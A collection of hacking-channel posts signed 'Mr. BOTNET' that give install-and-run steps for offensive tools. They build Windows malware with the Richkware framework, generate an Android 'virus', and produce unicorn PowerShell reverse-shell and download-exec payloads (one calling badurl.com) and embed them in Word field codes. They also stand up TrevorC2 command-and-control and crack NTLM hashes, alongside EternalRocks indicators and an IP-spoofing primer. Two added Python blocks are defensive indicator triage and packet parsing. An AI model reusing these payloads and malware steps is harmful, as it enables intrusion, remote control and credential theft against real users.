UNDERCODE COMMUNITY

🦑 HOW TO check Packet Injection capabilities in all connected wireless cards
T.me/UndercOdeTestingOfficial

🦑 Dependencies

1) aircrack-ng: install it by executing the following command as root in a terminal

> apt install aircrack-ng

2) awk: install it by running the following command as root in a terminal

> apt install gawk

Note: gawk is already installed on most Linux distributions

🦑 Supported distros: all Debian-based, Ubuntu, Fedora, Kali, Arch, OpenSUSE.

🦑 INSTALLATION:

1) Download the master zip and extract all files to any location.

> https://github.com/Enixes/Injectorist

2) Open a terminal and navigate to the extracted folder

> cd /location/of/extraction

3) Gain root access

> su
Enter root password:____

4) Make the script InjectionCheck executable

> chmod +x InjectionCheck

5) Run the script

> ./InjectionCheck

6) Now Injectorist will scan all connected wireless cards for packet injection

@ STEAVE(KL.)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 Install Ubuntu On Android Without Root New 2019
t.me/UnderCodeTestingOfficial

🦑 INSTALLATION & RUN:

Open Termux and type:
1) apt update

2) apt upgrade

3) apt install git wget proot -y

4) git clone https://github.com/htr-tech/ubuntu

5) cd ubuntu

6) chmod +x ubuntu.sh

7) bash ubuntu.sh

🦑 All in one command:

> apt update && apt install git wget proot -y && git clone https://github.com/htr-tech/ubuntu && cd ubuntu && chmod +x ubuntu.sh && bash ubuntu.sh

8) Start ubuntu

> bash start.sh

9) Exit ubuntu

> logout

🦑 Tested

Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 HOW TO ADD A NEW BRIDGE TO TOR BROWSER (TESTED)
instagram.com/UNderCodeTestingCompany

🦑 LET'S START


1) Once the bridge is running, find its bridge line. For obfs4, the bridge line is in the file <datadir>/pt_state/obfs4_bridgeline.txt.

2) You need to insert the external IP/port, and the fingerprint from the file <datadir>/fingerprint.

3) File a new ticket that contains the bridge line.
Component: Applications/Tor Browser
Keywords: tbb-bridges

4) Make a pull request at https://github.com/OpenObservatory/ooni-resources that adds the new bridge's IP/port to the file bridge_reachability/tor-bridges-ip-port.csv. (This will cause OONI to start testing the reachability of the new bridge.)

That's all!

@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 WHAT IS A WORM MALWARE/VIRUS?
t.me/UndercOdeTestingOfficial

🦑 LET'S START:

1) A worm virus is a malicious, self-replicating program that can spread throughout a network without human assistance.

2) Worms cause damage similar to viruses, exploiting holes in security software and potentially stealing sensitive information, corrupting files and installing a back door for remote access to the system, among other issues.

3) Worms often utilize large amounts of memory and bandwidth, so affected servers, networks and individual systems are often overloaded and stop responding.

4) Worms are not exactly viruses. Viruses need a host computer or operating system. The worm program operates alone.

5) The worm is often transmitted via file-sharing networks, information-transport features, email attachments or by clicking links to malicious websites. Once downloaded, the worm takes advantage of a weakness in its target system or tricks a user into executing it. Some worms have a phishing component that entices users to run the malicious code.

6) Internet worms are often designed to exploit new security issues, and search for systems that haven't installed current software or operating system security updates.

7) Classifications and names of worms include:

> Email-Worm

> IM-Worm

> IRC-Worm

> Net-Worm

> P2P-Worm

@ Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 EternalRocks worm (virus) BREAKED WINDOWS HACK TOOL
> MicroBotMassiveNet
instagram.com/UndercOdeTestingCompany
> It spreads through public (The Shadow Brokers NSA dump) SMB exploits: ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY, along with related programs: DOUBLEPULSAR, ARCHITOUCH and SMBTOUCH.

» taskhost.exe properties

> First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C ( ubgdgno5eswkhmpy. onion) communication requesting further instructions (e.g. installation of new components).

🦑 INSTALLATION & RUN:

1) Downloading required .NET components (first stage)

> http://api.nuget.org/packages/taskscheduler.2.5.23.nupkg

> http://api.nuget.org/packages/sharpziplib.0.86.0.nupkg # in newer variants

2) Appendix

> Decompilation of an older sample

C# source # 1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d

3) Globals

> Network traffic capture (PCAP)

4) Windows 7 x64 SP1 Honeypot # initial exploitation capture

5) Yara rules

> EternalRocks.yara

🦑 Debug strings

> C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

> C:\Users\tmc\Documents\DownLoader\Project1.vbp

> C:\Users\tmc\Documents\TorUnzip\Project1.vbp

> c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb

> C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb

6) Now Download .zip file

> https://github.com/stamparm/EternalRocks/archive/master.zip

🦑 File paths

> c:\Program Files\Microsoft Updates\

> Scheduled tasks

> ServiceHost -> C:\Program Files\Microsoft Updates\svchost.exe # system start, log on, daily

> TaskHost -> C:\Program Files\Microsoft Updates\taskhost.exe # system start, log on, daily

@ Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁
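
A defender-side triage of the indicators listed in the post above, as an added example that is not part of the original post or of the linked repository: it checks an exported scheduled-task list against the listed drop directory and task names, and scans a byte buffer for the listed debug paths. The CSV columns, the sample rows and the sample buffer are constructed; the VB6.OLB path is left out because it is a stock Visual Basic 6 path rather than something specific to this sample.

```python
import csv
import io
from pathlib import PureWindowsPath

# Indicators copied from the post above.
DROP_DIR = PureWindowsPath(r"C:\Program Files\Microsoft Updates")
TASKS = {"servicehost": "svchost.exe", "taskhost": "taskhost.exe"}
DEBUG_STRINGS = [
    rb"C:\Users\tmc\Documents\DownLoader\Project1.vbp",
    rb"C:\Users\tmc\Documents\TorUnzip\Project1.vbp",
    rb"c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb",
    rb"C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb",
]

# Constructed sample: a two-column export of scheduled tasks (assumed layout).
SAMPLE_TASKS = r'''"TaskName","Task To Run"
"\ServiceHost","C:\Program Files\Microsoft Updates\svchost.exe"
"\TaskHost","""c:\program files\microsoft updates\taskhost.exe"" -s"
"\Microsoft\Windows\Defrag\ScheduledDefrag","C:\Windows\system32\defrag.exe -c"
'''

# Constructed sample: bytes standing in for a file that embeds one debug path.
SAMPLE_BLOB = b"MZ\x90\x00" + b"\x00" * 16 + b"RSDS" + DEBUG_STRINGS[2].upper() + b"\x00"


def executable_of(command: str) -> PureWindowsPath:
    """Return the program path from a task command line (quoted or not)."""
    command = command.strip()
    if command.startswith('"'):
        return PureWindowsPath(command[1:].split('"', 1)[0])
    end = command.lower().find(".exe")
    return PureWindowsPath(command[: end + 4] if end != -1 else command)


def triage_tasks(csv_text: str) -> list:
    """Flag tasks whose binary or name matches the indicators above."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row["TaskName"].rsplit("\\", 1)[-1]   # drop the task folder
        exe = executable_of(row["Task To Run"])
        reasons = []
        if exe.parent == DROP_DIR:                   # Windows paths compare case-insensitively
            reasons.append("binary in listed drop directory")
        if TASKS.get(name.lower()) == exe.name.lower():
            reasons.append("task name/binary pair from the post")
        if reasons:
            hits.append({"task": name, "exe": str(exe), "reasons": reasons})
    return hits


def find_debug_strings(blob: bytes) -> list:
    """Return the listed debug paths found in blob, ignoring case."""
    haystack = blob.lower()
    return [s.decode() for s in DEBUG_STRINGS if s.lower() in haystack]


if __name__ == "__main__":
    for hit in triage_tasks(SAMPLE_TASKS):
        print(hit["task"], "->", hit["exe"], hit["reasons"])
    print(find_debug_strings(SAMPLE_BLOB))
```
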

🦑 Framework for building Windows malware written in C++ 2019 new release
> Virus / Worms / Bot / Spyware / Keylogger / Scareware
> Richkware is a library of network and OS functions, that you can use to create malware. The composition of these functions permits the application to assume behaviors referable to the following types of malware
t.me/UndercOdeTestingCompany

🦑 INSTALLATION & RUN:

1) git clone https://github.com/richkmeli/Richkware

2) cd Richware

3) Open main.cpp, and create an instance of Richkware.

4) With Richkware-Manager-Server

If you have deployed RMS, you can initialize the malware as follows:

int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}

5) Otherwise, if you haven't deployed RMS, you can use:

Richkware richkware("Richk","richktest");

in this way, it uses "richktest" as encryption key.


> ( Using MinGW for Windows or MinGW cross compiler for Linux build environment

make)

6) Compiling :

Using Microsoft C++ compiler (Visual Studio)

> C/C++ > Preprocessor > Preprocessor Definitions, add

> "_CRT_SECURE_NO_WARNINGS"
Linker > Input > Additional Dependencies, add "Ws2_32.lib"

7) Remotely Command Execution

Call framework function StartServer in the main, it starts server on a port, in the following example is the TCP port 8000. Remember that if a port is already used by another program, you can't use that port, until the program will be stopped.

int main () {
...
richkware.network.server.Start("8000");
...
}
8)Connect using terminal in Unix systems

In Unix systems, you can use netcat, and run the following command:

nc <serverName> 8000

9) Connect using terminal in Windows

In Windows, you can use telnet, in the same way:

> telnet <serverName> 8000

๐Ÿฆ‘E N J O Y

WRITTEN BY Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 Install ADB & FastBoot Tools in Termux!
2019
t.me/UndercOdeTestingOfficial

🦑 INSTALLATION & RUN:

A) Silent installation:

1) Copy and paste the following command in Termux to silently install Tools:

> apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash InstallTools.sh

B) Common installation:

1) Copy and paste the following command in Termux to install Tools with logs output:

> apt update && apt install wget && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh

🦑 Tested

@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 How To Compress / Decompress Brawl Stars SC files on Windows / Linux / Android!
instagram.com/UnderCodeTestingCompany

🦑 INSTALLATION & RUN:

> On Windows:

1) Download Python 3.5 or newer version from official page.
>https://www.python.org/downloads/

2) Install Python. While Installing, enable such parameters as "Add Python to PATH", "Install pip", "Install py launcher", "Associate files with Python" and "Add Python to environment variables".

3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases

4) Execute "Init.py" file to install required modules and create workspace directories.

🦑 On Linux:

1) Open Terminal and install Python by executing the following command:

> sudo apt-get update && sudo apt-get install python3 python3-pip

2) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases

3) Execute "Init.py" file to install required modules and create workspace directories.

🦑 On Android:

1) Download and install PyDroid app from Google Play.
> https://play.google.com/store/apps/details?id=ru.iiec.pydroid3

2) Open PyDroid and wait until Python installs.

3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases


4) In PyDroid open and execute "Init.py" file to install required modules and create workspace directories.


🦑 How to use

1) To compile SC:

> Put folders with texture name and .png files inside them in the "In-Decompressed-SC" directory and execute the "SC-Encode.py" script. After the process has finished, your .sc files will appear in the "Out-Compressed-SC" folder.

2) To decompile SC:

> Put .sc files in the "In-Compressed-SC" directory and execute the "SC-Decode.py" script. After the process has finished, your .png files will appear in the "Out-Decompressed-SC" folder.

🦑 Tested By undercOde

> Win Server Essentials

> Android 8.0

@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 WIN32/SIREFEF VIRUS: I just tested this virus and its effect on Windows in UndercOde; I declare:
t.me/UndercOdeTestingOfficial

🦑 LET'S START:

> This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:

1) Downloading and running other files

2) Contacting remote hosts

3) Disabling security features

4) Members of the family can also change search results, which can generate money for the hackers who use Sirefef.

> Variants of Win32/Sirefef might be installed by other malware, including variants of the Trojan:Win32/Necurs family.

5) This kind of virus is dangerous and can't be removed easily

> In addition, anti-virus apps detect and remove the whole file; it can't be removed from those files by anti-virus apps

Written by Steaven
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 How to Create a Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany

🦑 INSTALLATION & RUN:

1) apt update && apt upgrade

2) apt install git

3) apt install python && apt install python2

4) git clone https://github.com/TheReaper167/Malicious

5) cd Malicious

6) pip2 install -r requirements.txt

7) pip2 install requests

8) python2 malicious.py

9) After downloading the virus, open your file explorer

10) Find the folder Malicious and open it

11) Choose and open the folder Android if you downloaded the Android virus

Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 Automate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial

🦑 INSTALLATION & RUN:

1) mkdir -p hashcat/deps

2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL

3) cd hashcat/

4) make

5) make install

6) python wordlist_optimizer.py <input file list> <output directory>

7) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists

8) hashcat --help |grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems

🦑 Features:

(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
🦑 Tested by UndercOde On:

> Ubuntu

@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 New release 2019 in tool for using a PowerShell downgrade attack and inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack
> use for learning only
instagram.com/UndercOdeTestingCompany

🦑 INSTALLATION & RUN:

1) git clone https://github.com/trustedsec/unicorn

2) cd unicorn

3) python unicorn.py

4) Commands :

> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe

> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro

> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro

> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro

> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta

> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta

> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta

> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde

>CRT Example: python unicorn.py <path_to_payload/exe_encode> crt

>Custom PS1 Example: python unicorn.py <path to ps1 file>

> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500

> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)

>Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

🦑 To apply the payload:

1) Open Word

2) Insert tab -> Quick Parts -> Field

3) Choose = (Formula) and click ok.

4) Once the field is inserted, you should now see "!Unexpected End of Formula"

5) Right-click the Field, choose "Toggle Field Codes"

6) Paste in the code from Unicorn

7) Save the Word document.

E N J O Y
@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 TrevorC2 - Command and Control via Legitimate Behavior over HTTP
instagram.com/UndercOdeTestingCompany

🦑 INSTALLATION & RUN:

1) git clone https://github.com/trustedsec/trevorc2

2) cd trevorc2

3) pip install -r requirements.txt

4) trevor2_server.py

> to edit the file first, and customize, what website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is parameter that (again is configurable), which contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.

5) trevor2_client.py

> all you need in any configurable option is the ability to call out to a website, parse some basic data, and then execute a command and then put the results in a base64 encoded query string parameter to the site. That's it, not hard.

6) trevor2_client.ps1

> powershell implementation of trevor2_client.py, this allows you to use native PowerShell to interact with Trevor2_Server.

🦑 Dockerfile:

1) git clone https://github.com/trustedsec/trevorc2.git

2) cd trevorc2
# At this point, setting up docker-machine to remotely deploy works great

3) docker build -t trevorc2 .

4) docker run -it -p 80:80 -p 443:443 trevorc2

USE FOR LEARN ONLY

@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 Test WPA3 using virtual Wi-Fi interfaces
t.me/undercOdeTestingOfficial

🦑 INSTALLATION & RUN:

1) git clone https://github.com/vanhoefm/hostap-wpa3

2) cd hostap-wpa3/hostapd

3) cp defconfig .config

4) make -j 2

5) cd ..

6) now for wpa_supplicant:

> cd wpa_supplicant

7) cp defconfig .config

8) make -j 2

9) sudo modprobe mac80211_hwsim radios=3

> rfkill unblock wifi

10) Optionally kill other Wi-Fi clients the brute-force way:

> sudo pkill wpa_supplicant

11) Open a new terminal, and in the directory hostapd execute:

> sudo ./hostapd hostapd_wpa3.conf -dd -K

12) Open another terminal, and in the directory wpa_supplicant execute:

> sudo ./wpa_supplicant -D nl80211 -i wlan1 -c supp_wpa3.conf -dd -K

Written by Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 IP Spoofing FULL:

The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial

🦑 Why it works?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is a security weakness in the TCP protocol known as sequence number prediction.

🦑 How it works?
To completely understand how IP spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.

🦑 Internet Protocol (IP):
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.

> Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contain the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field.

🦑 Transmission Control Protocol (TCP):
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments received from the other end.


> As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.

> TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.

> TCP packets can be manipulated using several packet crafting softwares available on the internet.

🦑 The Attack
IP-spoofing consists of several steps. First, the target host is chosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.

> Spoofing can be implemented in different ways, as given below:

🦑 Non-Blind Spoofing: This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.

🦑 Blind Spoofing: Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.

🦑 Usage:

IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against – Denial of Service attacks, or DoS.

@Mr. BOTNET(tm)

▁ ▂ ▄ UnderCode ▄ ▂ ▁
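
The header fields described in the post above, as an added example that is not part of the original post: it parses the IPv4 source and destination addresses and the TCP sequence fields from a constructed packet, computes the next expected sequence number with 32-bit wraparound, and applies a source-address check of the kind an ingress filter performs. The packet bytes, the prefixes and the ingress check itself are assumptions added here.

```python
import ipaddress
import struct

SYN, FIN = 0x02, 0x01   # the flags that each consume one sequence number

# Constructed sample: 20-byte IPv4 header, 20-byte TCP header, 4 bytes of data.
SAMPLE_PACKET = bytes.fromhex(
    "4500002c" "00010000" "40060000"   # first 12 bytes: version/IHL ... checksum
    "c000020a" "c6336407"              # next 8 bytes: source, destination
    "c0000050" "fffffffe" "00001000"   # TCP: ports, sequence, acknowledgement
    "50187210" "00000000"              # data offset/flags, window, checksum, urgent
    "70696e67"                         # payload
)


def parse_ipv4_tcp(packet: bytes) -> dict:
    """Extract addresses and sequence fields from an IPv4/TCP packet."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _ident, _frag, _ttl, proto, _csum = struct.unpack(
        "!BBHHHBBH", packet[:12])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or proto != 6:
        raise ValueError("not an IPv4 packet carrying TCP")
    if len(packet) < ihl + 20:
        raise ValueError("truncated TCP header")
    _sport, dport, seq, ack, off_flags = struct.unpack(
        "!HHIIH", packet[ihl:ihl + 14])
    data_off = (off_flags >> 12) * 4
    flags = off_flags & 0x1FF
    payload_len = total_len - ihl - data_off
    if data_off < 20 or payload_len < 0:
        raise ValueError("inconsistent length fields")
    # Every data byte is sequenced, plus one number each for SYN and FIN.
    consumed = payload_len + bool(flags & SYN) + bool(flags & FIN)
    return {
        "src": str(ipaddress.IPv4Address(packet[12:16])),
        "dst": str(ipaddress.IPv4Address(packet[16:20])),
        "dport": dport,
        "seq": seq,
        "ack": ack,
        "payload_len": payload_len,
        "next_seq": (seq + consumed) % 2**32,   # 32-bit counter wraps to 0
    }


def source_allowed(src: str, expected_prefixes: list) -> bool:
    """Ingress-style check: is src inside the prefixes expected on this interface?"""
    addr = ipaddress.ip_address(src)
    return any(addr in ipaddress.ip_network(p) for p in expected_prefixes)


if __name__ == "__main__":
    pkt = parse_ipv4_tcp(SAMPLE_PACKET)
    print(pkt)
    # Hypothetical interfaces: one serving 192.0.2.0/24, one serving 203.0.113.0/24.
    print("accepted on matching interface:", source_allowed(pkt["src"], ["192.0.2.0/24"]))
    print("accepted on other interface:", source_allowed(pkt["src"], ["203.0.113.0/24"]))
```
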

🦑 ITWSV - Integrated Tool for Web Security Vulnerability.
ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.
Instagram.com/UndercodeTestingCompany

🦑 INSTALLATION & RUN:

1) git clone https://github.com/penetrate2hack/ITWSV.git

2) cd ITWSV

3) chmod +x start.sh

4) chmod +x update.sh (only if required)

5) ./start.sh

🦑 FEATURES:
• WHOIS
• DNSWALK
• FIERCE
• DNSRecon
• DNSenum
• NMAP
• DMitry
• theHarvester
• LBD
• SSLScan
• SSLYze
• WhatWeb
• Automater
• Grabber
• Parsero
• Uniscan
• Metagoofil
• A2SV
• WPScan
• Droopescan
• WPSeku
• XssPy
• Spaghetti
• sublist3r
• WAFW00F
• nslookup
• dirsearch
• OWASP Joomscan
• Gobuster

🦑 TESTED ON:

> PARROT

> DEBIAN

> KALI

@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 How to be completely anonymous online by undercOde:
t.me/UndercOdeTestingOfficial

🦑 LET'S START:

1) use a fake MAC address for your WLAN card

2) use your Linux or Windows in a VM

3) use the anonsurf tool (vpn+tor server and much more)

> git clone https://github.com/Und3rf10w/kali-anonsurf

> cd kali-anonsurf

> ./installer.sh

4) use proxies

5) make sure you have the latest updates installed on your system

6) never maximize any browser

7) Never think you can be anonymous on rooted- or non rooted phone 😆

! well done

@Mr. BOTNET(tm)
▁ ▂ ▄ UnderCode ▄ ▂ ▁